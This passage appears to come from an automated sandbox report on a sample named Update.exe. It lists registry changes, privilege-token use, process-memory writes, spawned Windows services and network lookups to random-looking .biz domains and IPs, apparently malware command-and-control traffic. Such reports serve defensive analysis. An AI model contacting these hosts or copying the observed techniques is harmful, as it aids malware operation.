| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\System32\SensorDataService.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\System32\SensorDataService.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\System32\GameInputSvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\System32\SensorDataService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\System32\SensorDataService.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\TieringEngineService.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\TieringEngineService.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\System32\SnippingTool.exe,-15052 = "Capture a portion of your screen so you can save, annotate, or share the image." | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Windows\system32\odbcint.dll,-1694 = "ODBC Data Sources (64-bit)" | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@fxsresm.dll,-1131 = "Route through e-mail" | C:\Windows\system32\fxssvc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\OpenWithList | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.snd | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3gp\OpenWithList | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m1v\OpenWithList | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@"C:\Windows\system32\windowspowershell\v1.0\powershell.exe",-105 = "Windows PowerShell XML Document" | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\GameInputSvc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\GameInputSvc.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Windows\System32\ieframe.dll,-915 = "XHTML Document" | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Windows\system32\mstsc.exe,-4000 = "Remote Desktop Connection" | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpeg | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Windows\system32\SnippingTool.exe,-15051 = "Snipping Tool" | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\SearchFilterHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mhtml | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\GameInputSvc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\GameInputSvc.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Windows\System32\ieframe.dll,-913 = "MHTML Document" | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rmi | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.svg\OpenWithList | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%windir%\regedit.exe,-16 = "Registry Editor" | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.M2TS | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%systemroot%\system32\wdc.dll,-10031 = "Monitor the usage and performance of the following resources in real time: CPU, Disk, Network and Memory." | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\GameInputSvc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mht | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithList | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%windir%\system32\mstsc.exe,-4001 = "Use your computer to connect to a computer that is located elsewhere and run programs or access files." | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\GameInputSvc.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{01BE4CFB-129A-452B-A209-F9D40B3B84A5} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000d4d74ae9d444db01 | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mht\OpenWithList | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.au | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Windows\regedit.exe,-16 = "Registry Editor" | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{C120DE80-FDE4-49F5-A713-E902EF062B8A} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000009ed92be9d444db01 | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3gpp | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m4v\OpenWithList | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wav | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpg\OpenWithList | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%windir%\system32\MdSched.exe,-4002 = "Check your computer for memory problems." | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m4v | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Windows\system32\RecoveryDrive.exe,-500 = "Recovery Drive" | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.MOD | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\GameInputSvc.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{5985FC23-2588-4D9A-B38B-7E7AFFAB3155} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 010000000000000030ff51e9d444db01 | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-102 = "Microsoft Excel Template" | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%systemroot%\system32\Filemgmt.dll,-602 = "Starts, stops, and configures Windows services." | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Windows\system32\MdSched.exe,-4001 = "Windows Memory Diagnostic" | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\GameInputSvc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | C:\Windows\system32\SearchFilterHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.M2TS\OpenWithList | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{5383EF74-273B-4278-AB0C-CDAA9FD5369E} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 010000000000000074b135eed444db01 | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\GameInputSvc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-121 = "Microsoft Word 97 - 2003 Template" | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpe | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%windir%\system32\speech\speechux\sapi.cpl,-5556 = "Dictate text and control your computer by voice." | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%CommonProgramFiles%\Microsoft Shared\Ink\mip.exe,-292 = "Math Input Panel" | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\GameInputSvc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmv\OpenWithList | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E2FB4720-F45F-4A3C-8CB2-2060E12425C3} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 010000000000000091836ff0d444db01 | C:\Windows\system32\SearchProtocolHost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@fxsresm.dll,-1132 = "Store in a folder" | C:\Windows\system32\fxssvc.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@C:\Windows\system32\Taskmgr.exe,-32420 = "Task Manager" | C:\Windows\system32\SearchProtocolHost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\GameInputSvc.exe | N/A |
| N/A | N/A | C:\Windows\System32\GameInputSvc.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Update.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\fxssvc.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\System32\GameInputSvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\TieringEngineService.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\TieringEngineService.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\AgentService.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\alg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\alg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\alg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\msdtc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\msdtc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\msdtc.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\SearchIndexer.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4588 wrote to memory of 1768 | N/A | C:\Windows\System32\GameInputSvc.exe | C:\Windows\System32\GameInputSvc.exe |
| PID 4588 wrote to memory of 1768 | N/A | C:\Windows\System32\GameInputSvc.exe | C:\Windows\System32\GameInputSvc.exe |
| PID 2216 wrote to memory of 4292 | N/A | C:\Windows\system32\SearchIndexer.exe | C:\Windows\system32\SearchProtocolHost.exe |
| PID 2216 wrote to memory of 4292 | N/A | C:\Windows\system32\SearchIndexer.exe | C:\Windows\system32\SearchProtocolHost.exe |
| PID 2216 wrote to memory of 4600 | N/A | C:\Windows\system32\SearchIndexer.exe | C:\Windows\system32\SearchFilterHost.exe |
| PID 2216 wrote to memory of 4600 | N/A | C:\Windows\system32\SearchIndexer.exe | C:\Windows\system32\SearchFilterHost.exe |
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Update.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Update.exe"
C:\Windows\System32\alg.exe
C:\Windows\System32\alg.exe
C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv
C:\Windows\system32\fxssvc.exe
C:\Windows\system32\fxssvc.exe
C:\Windows\System32\GameInputSvc.exe
C:\Windows\System32\GameInputSvc.exe
C:\Windows\System32\GameInputSvc.exe
"C:\Windows\System32\GameInputSvc.exe" Global\GameInputSession_1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe"
C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
C:\Windows\System32\msdtc.exe
C:\Windows\System32\msdtc.exe
\??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
"c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE"
C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
C:\Windows\SysWow64\perfhost.exe
C:\Windows\SysWow64\perfhost.exe
C:\Windows\system32\locator.exe
C:\Windows\system32\locator.exe
C:\Windows\System32\SensorDataService.exe
C:\Windows\System32\SensorDataService.exe
C:\Windows\System32\snmptrap.exe
C:\Windows\System32\snmptrap.exe
C:\Windows\system32\spectrum.exe
C:\Windows\system32\spectrum.exe
C:\Windows\System32\OpenSSH\ssh-agent.exe
C:\Windows\System32\OpenSSH\ssh-agent.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s SharedRealitySvc
C:\Windows\system32\TieringEngineService.exe
C:\Windows\system32\TieringEngineService.exe
C:\Windows\system32\AgentService.exe
C:\Windows\system32\AgentService.exe
C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\SearchIndexer.exe /Embedding
C:\Windows\system32\SearchProtocolHost.exe
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
C:\Windows\system32\SearchFilterHost.exe
"C:\Windows\system32\SearchFilterHost.exe" 0 936 940 948 8192 944 916
C:\Windows\System32\msdtc.exe
C:\Windows\System32\msdtc.exe
C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
C:\Windows\system32\spectrum.exe
C:\Windows\system32\spectrum.exe
C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\SearchIndexer.exe /Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.203.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pywolwnvd.biz | udp |
| US | 54.244.188.177:80 | pywolwnvd.biz | tcp |
| US | 8.8.8.8:53 | pywolwnvd.biz | udp |
| US | 54.244.188.177:80 | pywolwnvd.biz | tcp |
| US | 8.8.8.8:53 | ssbzmoy.biz | udp |
| US | 8.8.8.8:53 | ssbzmoy.biz | udp |
| SG | 18.141.10.107:80 | ssbzmoy.biz | tcp |
| US | 8.8.8.8:53 | 177.188.244.54.in-addr.arpa | udp |
| SG | 18.141.10.107:80 | ssbzmoy.biz | tcp |
| US | 8.8.8.8:53 | cvgrf.biz | udp |
| US | 8.8.8.8:53 | cvgrf.biz | udp |
| US | 54.244.188.177:80 | cvgrf.biz | tcp |
| US | 8.8.8.8:53 | 107.10.141.18.in-addr.arpa | udp |
| US | 54.244.188.177:80 | cvgrf.biz | tcp |
| US | 8.8.8.8:53 | npukfztj.biz | udp |
| US | 44.221.84.105:80 | npukfztj.biz | tcp |
| US | 8.8.8.8:53 | przvgke.biz | udp |
| US | 8.8.8.8:53 | 105.84.221.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | npukfztj.biz | udp |
| US | 172.234.222.138:80 | przvgke.biz | tcp |
| US | 44.221.84.105:80 | npukfztj.biz | tcp |
| US | 8.8.8.8:53 | ww99.przvgke.biz | udp |
| US | 8.8.8.8:53 | przvgke.biz | udp |
| US | 72.52.179.174:80 | ww99.przvgke.biz | tcp |
| US | 172.234.222.138:80 | przvgke.biz | tcp |
| US | 8.8.8.8:53 | ww12.przvgke.biz | udp |
| US | 8.8.8.8:53 | 138.222.234.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.179.52.72.in-addr.arpa | udp |
| US | 76.223.26.96:80 | ww12.przvgke.biz | tcp |
